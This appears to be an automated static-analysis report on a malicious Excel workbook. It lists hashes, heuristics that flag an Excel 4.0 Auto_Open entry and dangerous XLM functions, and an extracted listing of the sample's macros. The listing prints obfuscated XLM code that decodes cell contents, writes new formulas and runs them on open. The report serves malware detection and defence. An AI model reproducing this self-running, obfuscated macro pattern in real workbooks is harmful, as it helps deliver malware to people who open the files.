Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fea2b6362485a887…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:38:08 Authoring application: Microsoft Excel First seen: 2021-04-01
MD5: 7d7822e458efa66d35b2c95b3a02aff8 SHA-1: a998afc6e09f83d9c29bcdb1a105b3f63fe97ad4 SHA-256: fea2b6362485a887f689df3e527deb747d941db57329ad6af6ab68ca02cf5a47
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6435 bytes
SHA-256: 40839c4291ad24373ddc05fbad974e0bdd33c726497d76e10548ae341b80cf51
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  juEnH
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!F189 
' 0018     21 LABEL : Cell Value, String Constant - cqZixt len=0 
' 0018     21 LABEL : Cell Value, String Constant - CurgYY len=0 
' 0018     21 LABEL : Cell Value, String Constant - cXnlZf len=0 
' 0018     25 LABEL : Cell Value, String Constant - fbmhoOgkep len=0 
' 0018     24 LABEL : Cell Value, String Constant - fTwWaYFkT len=0 
' 0018     22 LABEL : Cell Value, String Constant - hHJanSX len=0 
' 0018     22 LABEL : Cell Value, String Constant - KoEHOtM len=0 
' 0018     21 LABEL : Cell Value, String Constant - oQALyE len=0 
' 0018     22 LABEL : Cell Value, String Constant - qFRNlsN len=0 
' 0018     23 LABEL : Cell Value, String Constant - rLmVqKUI len=0 
' 0018     24 LABEL : Cell Value, String Constant - RMrOKllQI len=0 
' 0018     27 LABEL : Cell Value, String Constant - RszBzYyVKmGY len=0 
' 0018     20 LABEL : Cell Value, String Constant - TYfPu len=0 
' 0018     26 LABEL : Cell Value, String Constant - USyNcPYDIgS len=0 
' 0018     27 LABEL : Cell Value, String Constant - utWllbbaEYOG len=0 
' 0018     26 LABEL : Cell Value, String Constant - VHpMSkBwiML len=0 
' 0018     20 LABEL : Cell Value, String Constant - VPHvA len=0 
' 0018     27 LABEL : Cell Value, String Constant - yfPRHtCopCaz len=0 
' 0018     21 LABEL : Cell Value, String Constant - yLhUcU len=0 
' 0018     21 LABEL : Cell Value, String Constant - YpgDkn len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  juEnH,F92,"SET.NAME("fTwWaYFkT",VALUE("0"))",""
'  juEnH,F97,"SET.NAME("VPHvA",fTwWaYFkT)",""
'  juEnH,F99,"SET.NAME("USyNcPYDIgS",fTwWaYFkT)",""
'  juEnH,F104,"SET.NAME("oQALyE",COUNTA(yfPRHtCopCaz))",""
'  juEnH,F109,"SET.NAME("cXnlZf",COUNTA(RszBzYyVKmGY))",""
'  juEnH,F111,[],""
'  juEnH,F116,"SET.NAME("cqZixt","")",""
'  juEnH,F119,"VPHvA",""
'  juEnH,F124,"SET.NAME("hHJanSX",HLOOKUP("*",yfPRHtCopCaz,VPHvA,FALSE))",""
'  juEnH,F126,"YpgDkn",""
'  juEnH,F129,"SET.NAME("KoEHOtM",fTwWaYFkT)",""
'  juEnH,F131,[],""
'  juEnH,F135,"KoEHOtM",""
'  juEnH,F137,"qFRNlsN",""
'  juEnH,F139,"VHpMSkBwiML",""
'  juEnH,F142,"rLmVqKUI",""
'  juEnH,F145,"SET.NAME("CurgYY",VALUE(HLOOKUP("*",RszBzYyVKmGY,rLmVqKUI,FALSE)))",""
'  juEnH,F150,"TYfPu",""
'  juEnH,F155,"cqZixt",""
'  juEnH,F160,"USyNcPYDIgS",""
'  juEnH,F165,NEXT(),""
'  juEnH,F169,"utWllbbaEYOG",""
'  juEnH,F174,"SET.NAME("f",INT(T(FORMULA(T(cqZixt)&"",""&T(utWllbbaEYOG)))))",""
'  juEnH,F176,"fbmhoOgkep",""
'  juEnH,F180,NEXT(),""
'  juEnH,F185,RETURN(),""
'  juEnH,F218,"SET.NAME("yLhUcU",F92)",""
'  juEnH,F223,"yfPRHtCopCaz",""
'  juEnH,F225,"SET.NAME("RszBzYyVKmGY",R72C13)",""
'  juEnH,F230,"SET.NAME("fbmhoOgkep",236)",""
'  juEnH,F232,"SET.NAME("RMrOKllQI",6)",""
'  juEnH,F235,yLhUcU(),""
'  juEnH,F236,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.